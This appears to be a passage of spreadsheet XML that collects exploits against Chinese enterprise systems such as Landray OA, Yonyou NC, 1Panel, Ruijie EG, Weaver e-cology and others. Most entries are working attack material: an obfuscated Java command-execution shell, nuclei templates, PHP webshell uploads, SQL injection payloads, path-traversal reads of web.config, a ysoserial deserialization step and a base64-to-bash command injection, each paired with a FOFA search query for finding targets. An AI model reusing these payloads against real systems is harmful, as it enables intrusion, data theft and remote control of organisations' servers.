u0063\u0065\u006f\u0066\u0020\u0052\u0075\u006e\u006e\u0061\u0062\u006c\u0065\u0029\u0029\u0020\u007b\u0020\u0063\u006f\u006e\u0074\u0069\u006e\u0075\u0065\u003b\u0020\u007d\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0074\u0068\u0069\u0073\u0024\u0030\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u006f\u0062\u006a\u0029\u003b\u0074\u0072\u0079\u0020\u007b\u0020\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0068\u0061\u006e\u0064\u006c\u0065\u0072\u0022\u0029\u003b\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u004e\u006f\u0053\u0075\u0063\u0068\u0046\u0069\u0065\u006c\u0064\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0065\u0029\u0020\u007b\u0020\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0053\u0075\u0070\u0065\u0072\u0063\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0053\u0075\u0070\u0065\u0072\u0063\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0068\u0061\u006e\u0064\u006c\u0065\u0072\u0022\u0029\u003b\u0020\u007d\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u006f\u0062\u006a\u0029\u003b\u0074\u0072\u0079\u0020\u007b\u0020\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0053\u0075\u0070\u0065\u0072\u0063\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0067\u006c\u006f\u0062\u0061\u006c\u0022\u0029\u003b\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u004e\u006f\u0053\u0075\u0063\u0068\u0046\u0069\u0065\u006c\u0064\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0065\u0029\u0020\u007b\u0020\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0067\u006c\u006f\u0062\u0061\u006c\u0022\u0029\u003b\u0020\u007d\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u006f\u0062\u006a\u0029\u003b\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0073\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u004c\u0069\u0073\u0074\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0073\u0020\u003d\u0020\u0028\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u004c\u0069\u0073\u0074\u0029\u0020\u0028\u0066\u002e\u0067\u0065\u0074\u0028\u006f\u0062\u006a\u0029\u0029\u003b\u0066\u006f\u0072\u0020\u0028\u0069\u006e\u0074\u0020\u006a\u0020\u003d\u0020\u0030\u003b\u0020\u006a\u0020\u003c\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0073\u002e\u0073\u0069\u007a\u0065\u0028\u0029\u003b\u0020\u002b\u002b\u006a\u0029\u0020\u007b\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0020\u003d\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0073\u002e\u0067\u0065\u0074\u0028\u006a\u0029\u003b\u0066\u0020\u003d\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0072\u0065\u0071\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u004f\u0062\u006a\u0065\u0063\u0074\u0020\u0072\u0065\u0071\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0029\u003b\u004f\u0062\u006a\u0065\u0063\u0074\u0020\u0072\u0065\u0073\u0070\u0020\u003d\u0020\u0072\u0065\u0071\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0067\u0065\u0074\u0052\u0065\u0073\u0070\u006f\u006e\u0073\u0065\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u0030\u005d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0071\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u0030\u005d\u0029\u003b\u0073\u0074\u0072\u0020\u003d\u0020\u0028\u0053\u0074\u0072\u0069\u006e\u0067\u0029\u0020\u0072\u0065\u0071\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0067\u0065\u0074\u0048\u0065\u0061\u0064\u0065\u0072\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0053\u0074\u0072\u0069\u006e\u0067\u002e\u0063\u006c\u0061\u0073\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0071\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u0022\u0043\u006d\u0064\u0022\u007d\u0029\u003b\u0069\u0066\u0020\u0028\u0073\u0074\u0072\u0020\u0021\u003d\u0020\u006e\u0075\u006c\u006c\u0020\u0026\u0026\u0020\u0021\u0073\u0074\u0072\u002e\u0069\u0073\u0045\u006d\u0070\u0074\u0079\u0028\u0029\u0029\u0020\u007b\u0020\u0072\u0065\u0073\u0070\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0073\u0065\u0074\u0053\u0074\u0061\u0074\u0075\u0073\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0069\u006e\u0074\u002e\u0063\u006c\u0061\u0073\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0073\u0070\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u006e\u0065\u0077\u0020\u0049\u006e\u0074\u0065\u0067\u0065\u0072\u0028\u0032\u0030\u0030\u0029\u007d\u0029\u003b\u0053\u0074\u0072\u0069\u006e\u0067\u005b\u005d\u0020\u0063\u006d\u0064\u0073\u0020\u003d\u0020\u0053\u0079\u0073\u0074\u0065\u006d\u002e\u0067\u0065\u0074\u0050\u0072\u006f\u0070\u0065\u0072\u0074\u0079\u0028\u0022\u006f\u0073\u002e\u006e\u0061\u006d\u0065\u0022\u0029\u002e\u0074\u006f\u004c\u006f\u0077\u0065\u0072\u0043\u0061\u0073\u0065\u0028\u0029\u002e\u0063\u006f\u006e\u0074\u0061\u0069\u006e\u0073\u0028\u0022\u0077\u0069\u006e\u0064\u006f\u0077\u0022\u0029\u0020\u003f\u0020\u006e\u0065\u0077\u0020\u0053\u0074\u0072\u0069\u006e\u0067\u005b\u005d\u007b\u0022\u0063\u006d\u0064\u002e\u0065\u0078\u0065\u0022\u002c\u0020\u0022\u002f\u0063\u0022\u002c\u0020\u0073\u0074\u0072\u007d\u0020\u003a\u0020\u006e\u0065\u0077\u0020\u0053\u0074\u0072\u0069\u006e\u0067\u005b\u005d\u007b\u0022\u002f\u0062\u0069\u006e\u002f\u0073\u0068\u0022\u002c\u0020\u0022\u002d\u0063\u0022\u002c\u0020\u0073\u0074\u0072\u007d\u003b\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u0063\u0068\u0061\u0072\u0073\u0065\u0074\u004e\u0061\u006d\u0065\u0020\u003d\u0020\u0053\u0079\u0073\u0074\u0065\u006d\u002e\u0067\u0065\u0074\u0050\u0072\u006f\u0070\u0065\u0072\u0074\u0079\u0028\u0022\u006f\u0073\u002e\u006e\u0061\u006d\u0065\u0022\u0029\u002e\u0074\u006f\u004c\u006f\u0077\u0065\u0072\u0043\u0061\u0073\u0065\u0028\u0029\u002e\u0063\u006f\u006e\u0074\u0061\u0069\u006e\u0073\u0028\u0022\u0077\u0069\u006e\u0064\u006f\u0077\u0022\u0029\u0020\u003f\u0020\u0022\u0047\u0042\u004b\u0022\u003a\u0022\u0055\u0054\u0046\u002d\u0038\u0022\u003b\u0062\u0079\u0074\u0065\u005b\u005d\u0020\u0074\u0065\u0078\u0074\u0032\u0020\u003d\u0028\u006e\u0065\u0077\u0020\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u0053\u0063\u0061\u006e\u006e\u0065\u0072\u0028\u0028\u006e\u0065\u0077\u0020\u0050\u0072\u006f\u0063\u0065\u0073\u0073\u0042\u0075\u0069\u006c\u0064\u0065\u0072\u0028\u0063\u006d\u0064\u0073\u0029\u0029\u002e\u0073\u0074\u0061\u0072\u0074\u0028\u0029\u002e\u0067\u0065\u0074\u0049\u006e\u0070\u0075\u0074\u0053\u0074\u0072\u0065\u0061\u006d\u0028\u0029\u002c\u0063\u0068\u0061\u0072\u0073\u0065\u0074\u004e\u0061\u006d\u0065\u0029\u0029\u002e\u0075\u0073\u0065\u0044\u0065\u006c\u0069\u006d\u0069\u0074\u0065\u0072\u0028\u0022\u005c\u005c\u0041\u0022\u0029\u002e\u006e\u0065\u0078\u0074\u0028\u0029\u002e\u0067\u0065\u0074\u0042\u0079\u0074\u0065\u0073\u0028\u0063\u0068\u0061\u0072\u0073\u0065\u0074\u004e\u0061\u006d\u0065\u0029\u003b\u0062\u0079\u0074\u0065\u005b\u005d\u0020\u0072\u0065\u0073\u0075\u006c\u0074\u003d\u0028\u0022\u0045\u0078\u0065\u0063\u0075\u0074\u0065\u003a\u0020\u0020\u0020\u0020\u0022\u002b\u006e\u0065\u0077\u0020\u0053\u0074\u0072\u0069\u006e\u0067\u0028\u0074\u0065\u0078\u0074\u0032\u002c\u0022\u0075\u0074\u0066\u002d\u0038\u0022\u0029\u0029\u002e\u0067\u0065\u0074\u0042\u0079\u0074\u0065\u0073\u0028\u0063\u0068\u0061\u0072\u0073\u0065\u0074\u004e\u0061\u006d\u0065\u0029\u003b\u0074\u0072\u0079\u0020\u007b\u0020\u0043\u006c\u0061\u0073\u0073\u0020\u0063\u006c\u0073\u0020\u003d\u0020\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u0022\u006f\u0072\u0067\u002e\u0061\u0070\u0061\u0063\u0068\u0065\u002e\u0074\u006f\u006d\u0063\u0061\u0074\u002e\u0075\u0074\u0069\u006c\u002e\u0062\u0075\u0066\u002e\u0042\u0079\u0074\u0065\u0043\u0068\u0075\u006e\u006b\u0022\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0063\u006c\u0073\u002e\u006e\u0065\u0077\u0049\u006e\u0073\u0074\u0061\u006e\u0063\u0065\u0028\u0029\u003b\u0063\u006c\u0073\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0073\u0065\u0074\u0042\u0079\u0074\u0065\u0073\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0062\u0079\u0074\u0065\u005b\u005d\u002e\u0063\u006c\u0061\u0073\u0073\u002c\u0020\u0069\u006e\u0074\u002e\u0063\u006c\u0061\u0073\u0073\u002c\u0020\u0069\u006e\u0074\u002e\u0063\u006c\u0061\u0073\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u006f\u0062\u006a\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u0072\u0065\u0073\u0075\u006c\u0074\u002c\u0020\u006e\u0065\u0077\u0020\u0049\u006e\u0074\u0065\u0067\u0065\u0072\u0028\u0030\u0029\u002c\u0020\u006e\u0065\u0077\u0020\u0049\u006e\u0074\u0065\u0067\u0065\u0072\u0028\u0072\u0065\u0073\u0075\u006c\u0074\u002e\u006c\u0065\u006e\u0067\u0074\u0068\u0029\u007d\u0029\u003b\u0072\u0065\u0073\u0070\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0064\u006f\u0057\u0072\u0069\u0074\u0065\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0063\u006c\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0073\u0070\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u006f\u0062\u006a\u007d\u0029\u003b\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u004e\u006f\u0053\u0075\u0063\u0068\u004d\u0065\u0074\u0068\u006f\u0064\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0076\u0061\u0072\u0035\u0029\u0020\u007b\u0020\u0043\u006c\u0061\u0073\u0073\u0020\u0063\u006c\u0073\u0020\u003d\u0020\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u0022\u006a\u0061\u0076\u0061\u002e\u006e\u0069\u006f\u002e\u0042\u0079\u0074\u0065\u0042\u0075\u0066\u0066\u0065\u0072\u0022\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0063\u006c\u0073\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0077\u0072\u0061\u0070\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0062\u0079\u0074\u0065\u005b\u005d\u002e\u0063\u006c\u0061\u0073\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0063\u006c\u0073\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u0072\u0065\u0073\u0075\u006c\u0074\u007d\u0029\u003b\u0072\u0065\u0073\u0070\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0064\u006f\u0057\u0072\u0069\u0074\u0065\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0063\u006c\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0073\u0070\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u006f\u0062\u006a\u007d\u0029\u003b\u0020\u007d\u0066\u006c\u0061\u0067\u0020\u003d\u0020\u0074\u0072\u0075\u0065\u003b\u0020\u007d\u0069\u0066\u0020\u0028\u0066\u006c\u0061\u0067\u0029\u0020\u007b\u0020\u0062\u0072\u0065\u0061\u006b\u003b\u0020\u007d\u0020\u007d\u0069\u0066\u0020\u0028\u0066\u006c\u0061\u0067\u0029\u0020\u007b\u0020\u0062\u0072\u0065\u0061\u006b\u003b\u0020\u007d\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0065\u0029\u0020\u007b\u0020\u0063\u006f\u006e\u0074\u0069\u006e\u0075\u0065\u003b\u0020\u007d\u0020\u007d&amp;modelName=test</t>
  </si>
  <si>
    <t>蓝凌OA 文件Copy导致远程代码执行</t>
  </si>
  <si>
    <t>id: Landray-OA-filecopy-rce
info:
  name: 蓝凌OA 文件Copy导致远程代码执行
  author: god
  severity: high
  description: 蓝凌OA 文件Copy导致远程代码执行
  metadata:
    fofa-query: app="FE-协作平台"
  tags: rce,Landray,oa
http:
- raw:
  - |
    @timeout: 30s
    POST /sys/ui/sys_ui_component/sysUiComponent.do HTTP/1.1
    Host: {{Hostname}}
    Accept:application/json,text/javascript,*/*;q=0.01
    Accept-Encoding:gzip,deflate
    Accept-Language:zh-CN,zh;q=0.9,en;q=0.8
    Connection:close
    Content-Type:multipart/form-data;boundary=----WebKitFormBoundaryL7ILSpOdIhIIvL51
    User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/83.0.4103.116Safari/537.36
    X-Requested-With:XMLHttpRequest
    Content-Length: 393
    ------WebKitFormBoundaryL7ILSpOdIhIIvL51
    Content-Disposition:form-data;name="method"
    replaceExtend
    ------WebKitFormBoundaryL7ILSpOdIhIIvL51
    Content-Disposition:form-data;name="extendId"
    ../../../../resource/help/km/review/
    ------WebKitFormBoundaryL7ILSpOdIhIIvL51
    Content-Disposition:form-data;name="folderName"
    ../../../ekp/sys/common
    ------WebKitFormBoundaryL7ILSpOdIhIIvL51--
  - |+
    @timeout: 30s
    POST /resource/help/km/review/dataxml.jsp HTTP/1.1
    Host: {{Hostname}}
    User-Agent:Mozilla/5.0(Macintosh;IntelMacOSX10_15_7)AppleWebKit/537.36(KHTML,likeGecko)Chrome/113.0.0.0Safari/537.36
    Connection:close
    Content-Type:application/x-www-form-urlencoded
    Content-Length: 69
    s_bean=ruleFormulaValidate&amp;script=shell&amp;returnType=int&amp;modelName=test
  max-redirects: 3
  matchers-condition: and
  matchers:
      - type: dsl
        dsl:
          - 'status_code_1 == 200'
          - 'status_code_2 == 200'
          - 'contains(body_2, "dataList")'  
        condition: and</t>
  </si>
  <si>
    <t>云课网校系统文件上传(DVB-2024-6594)</t>
  </si>
  <si>
    <t>"/static/libs/common/jquery.stickyNavbar.min.js"</t>
  </si>
  <si>
    <t>POST /api/uploader/uploadImage HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Cache-Control: no-cache
Connection: keep-alive
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykvjj6DIn0LIXxe9m
x-requested-with: XMLHttpRequest
------WebKitFormBoundaryLZbmKeasWgo2gPtU
Content-Disposition: form-data; name="file"; filename="1G3311040N.php"
Content-Type: image/gif
&lt;?php phpinfo();?&gt;
------WebKitFormBoundaryLZbmKeasWgo2gPtU--</t>
  </si>
  <si>
    <t>建文工程管理系统 desktop 存在SQL注入</t>
  </si>
  <si>
    <t>body="Login/QRLogin.ashx"</t>
  </si>
  <si>
    <t>POST /SysFrame4/Desktop.ashx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
account=1'+and+%01(select+SUBSTRING(sys.fn_sqlvarbasetostr(HASHBYTES('MD5','233')),3,32))&lt;0--&amp;method=isChangePwd&amp;pwd=</t>
  </si>
  <si>
    <t>网御星云SSLVPN系统 SQL注入</t>
  </si>
  <si>
    <t>山石网科堡垒机存在0day</t>
  </si>
  <si>
    <t>天问物业 ERP 系统 ContractDownLoad.aspx 任意文件读取</t>
  </si>
  <si>
    <t>GET /HM/M_Main/InformationManage/ContractDownLoad.aspx?ContractFile=../web.config HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
GET /HM/M_main/InformationManage/OwnerVacantDownLoad.aspx?OwnerVacantFile=../web.config HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
GET /HM/M_main/InformationManage/ParkingFeelFileDownLoad.aspx?ParkingFile=../web.config HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
GET /HM/M_main/InformationManage/PlanDownLoad.aspx?PlanFile=../web.config HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
GET /HM/M_main/InformationManage/VacantDiscountDownLoad.aspx?VacantDiscountFile=../web.config HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close</t>
  </si>
  <si>
    <t>用友 NC 及 U8cloud LoggingConfigServlet 接口 反序列化漏
洞</t>
  </si>
  <si>
    <t>java -jar ysoserial.jar CommonsCollections6 "calc.exe" &gt; obj.bin
POST /servlet/~ic/nc.bs.logging.config.LoggingConfigServlet HTTP/1.1
Host:
恶意序列化数据</t>
  </si>
  <si>
    <t>1Panel 远程代码执行漏洞</t>
  </si>
  <si>
    <t>GET /.git/config HTTP/1.1
User-Agent: test',"test", "test", "", "YmxvZy5tbzYwLmNu", "test", 0, "deny", 0, 1);ATTACH DATABASE '/www/sites/test/index/test.php' AS test ;create TABLE
test.exp (dataz text) ; insert INTO test.exp (dataz) VALUES ('&lt;?php phpinfo();');#
Connection: close
Host: 172.23.80.143:8084</t>
  </si>
  <si>
    <t>锐捷EG易网关flwo.control.php命令执行漏洞(后台洞)</t>
  </si>
  <si>
    <t>app="Ruijie-EG易网关"</t>
  </si>
  <si>
    <t>POST /flow_control_pi/flwo.control.php?a=flowOpen HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 11
Accept: */*
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: {{cookie}}
Origin: {{BaseURL}}
Referer: {{BaseURL}}/rac_pi/surfilter_selservice.htm
Sec-Ch-Ua: " Not;A Brand";v="99", "Google Chrome";v="91", "Chromium";v="91"
Sec-Ch-Ua-Mobile: ?0
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: x
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip
type=%7Cbash+-c+%27echo+cm0gLXJmIC4uLzEyMzMyMXF3ZS50eHQgJiYgZWNobyBGMDhiYmZiMkJDOGNlZUQ2ID4gLi4vMTIzMzIxcXdlLnR4dCAyPiYx+%7C+base64+-d+%7C+bash+%26%26+exit+0%27</t>
  </si>
  <si>
    <t>联软安渡 UniNXG 安全数据交换系统SQL 注入漏洞</t>
  </si>
  <si>
    <t>/UniExServices/link/queryLinklnfo?address=%27%3BSELECT%20PG_SLEEP%285%2
9--</t>
  </si>
  <si>
    <t>飞讯云 WMS /MyDown/MyImportData 前台SQL注入</t>
  </si>
  <si>
    <t>body="wx8ccb75857bd3e985"</t>
  </si>
  <si>
    <t>GET /MyDown/MyImportData?opeid=1%27+WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close</t>
  </si>
  <si>
    <t>深信服VPN0day?</t>
  </si>
  <si>
    <t>北京电子印章电子合同签署系统存在组合漏洞</t>
  </si>
  <si>
    <t>中远麒麟堡垒机任意命令执行漏洞</t>
  </si>
  <si>
    <t>浪潮财务管理系存在反序列化漏洞</t>
  </si>
  <si>
    <t>泛微e-cology9接口WorkPlanService前台SQL注入</t>
  </si>
  <si>
    <t>app="泛微-协同商务系统"</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>POST</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> /services/WorkPlanService</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> HTTP/1.1</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
Content-Length:</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> 430</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
Cache-Control:</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> max-age=0</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Chrome/124.0.6367.118</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> Safari/537.36</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
Accept:</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,i</t>
